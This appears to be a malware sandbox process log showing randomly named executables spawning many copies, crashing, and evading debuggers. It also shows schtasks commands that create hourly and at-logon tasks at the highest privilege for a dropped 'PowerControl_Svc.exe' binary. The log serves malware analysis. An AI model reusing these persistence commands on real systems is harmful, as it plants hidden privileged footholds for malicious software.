C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:23540

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:3296

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:12780

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:14924

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13544

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:2208

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:23920

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:2540

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15224

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:23736

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13812

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:23892

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24364

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:17160

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24936

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24640

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:19064

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20788

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:25060

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:23056

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:22016

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:21964

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24560

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20448

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24440

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:25188

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:19356

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:18676

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:25920

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:7164

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:25960

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16600

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:3028

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:11920

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:21544

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:2204

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:25028

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:27540

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:26896

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:26764

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15032

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:27012

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:26252

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:28084

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:27592

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:28540

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 20688 -s 28
13⤵
- Program crash
PID:14980

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24396

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:22212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 22212 -s 28
13⤵
- Program crash
PID:25468

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:23188

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:10936

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:22116

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:21596

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:28884

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:29120

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:29148

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:14688

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:27948

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24672

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:19396

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:19952

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:23468

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:27324

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:30588

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:26100

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:23360

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:30056

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:26212

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:29936

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24984

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:20224

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24868

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:13196

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:26440

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:22840

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:30840

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:30200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 30200 -s 32
13⤵
- Program crash
PID:31696

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:27668

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:24484

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:32248

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:31008

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:32212

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:29960

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:30832

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:22396

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:5268

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:32680

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:33000

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:19544

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:11904

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:33692

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:16712

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15116

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:8240

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:34036

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:28212

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:34436

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:29716

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:33468

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:33076

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:28604

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:34864

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:35248

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:22516

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:35020

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:32480

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:31860

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:33544

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:5764

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:15720

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:36600

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:31800

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:412

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:27892

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:26352

C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
12⤵
PID:12516

C:\Users\Admin\Documents\9ZYMXQj8c7cYofKmgqeZQscL.exe
"C:\Users\Admin\Documents\9ZYMXQj8c7cYofKmgqeZQscL.exe"
11⤵
PID:5288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 304
12⤵
- Program crash
PID:7164

C:\Users\Admin\Documents\aM0E57XHzxBPiX5VujPMoel_.exe
"C:\Users\Admin\Documents\aM0E57XHzxBPiX5VujPMoel_.exe"
11⤵
PID:5296

C:\Users\Admin\Documents\p72TgwrSQJdXJf3NbR88XcOr.exe
"C:\Users\Admin\Documents\p72TgwrSQJdXJf3NbR88XcOr.exe"
11⤵
PID:5468

C:\Users\Admin\Documents\mmOry7dBfMvTPXLUeFEPMn9_.exe
"C:\Users\Admin\Documents\mmOry7dBfMvTPXLUeFEPMn9_.exe"
11⤵
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 280
12⤵
- Program crash
PID:5860

C:\Users\Admin\Documents\5lf4wMbH4mC3Lxf2JAoQ37rC.exe
"C:\Users\Admin\Documents\5lf4wMbH4mC3Lxf2JAoQ37rC.exe"
11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 244
12⤵
- Program crash
PID:6652

C:\Users\Admin\Documents\NfEHxrua3rTWP_tJEVVj_yAU.exe
"C:\Users\Admin\Documents\NfEHxrua3rTWP_tJEVVj_yAU.exe"
11⤵
PID:1528

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
12⤵
- Creates scheduled task(s)
PID:1180

C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
12⤵
PID:2608

C:\Users\Admin\Documents\M19r2XX9I3QptT4_h3UjaQLV.exe
"C:\Users\Admin\Documents\M19r2XX9I3QptT4_h3UjaQLV.exe"
13⤵
PID:6344

C:\Users\Admin\AppData\Roaming\8456642.exe
"C:\Users\Admin\AppData\Roaming\8456642.exe"
14⤵
PID:8268

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8268 -s 2180
15⤵
- Program crash
PID:26656

C:\Users\Admin\AppData\Roaming\1417004.exe
"C:\Users\Admin\AppData\Roaming\1417004.exe"
14⤵
PID:9052

C:\Users\Admin\AppData\Roaming\8387600.exe
"C:\Users\Admin\AppData\Roaming\8387600.exe"
14⤵
PID:9196

C:\Users\Admin\AppData\Roaming\3816529.exe
"C:\Users\Admin\AppData\Roaming\3816529.exe"
14⤵
PID:7280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 2240
15⤵
- Program crash
PID:24100

C:\Users\Admin\Documents\5CaFX5G3LWOsJ9nhFxB5BqJv.exe
"C:\Users\Admin\Documents\5CaFX5G3LWOsJ9nhFxB5BqJv.exe"
13⤵
PID:5492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 280
14⤵
- Program crash
PID:9876

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
12⤵
- Creates scheduled task(s)
PID:6500

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
"C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe"
11⤵
PID:3160

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:6912

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:6492

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:3548

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:3436

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:6328

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:1304

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:7896

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:7760

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:1256

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:4784

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:4652

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:5644

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:8932

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:2612

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9160

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:4084

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9556

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:10060

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:9804

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:7572

C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
12⤵
PID:2432

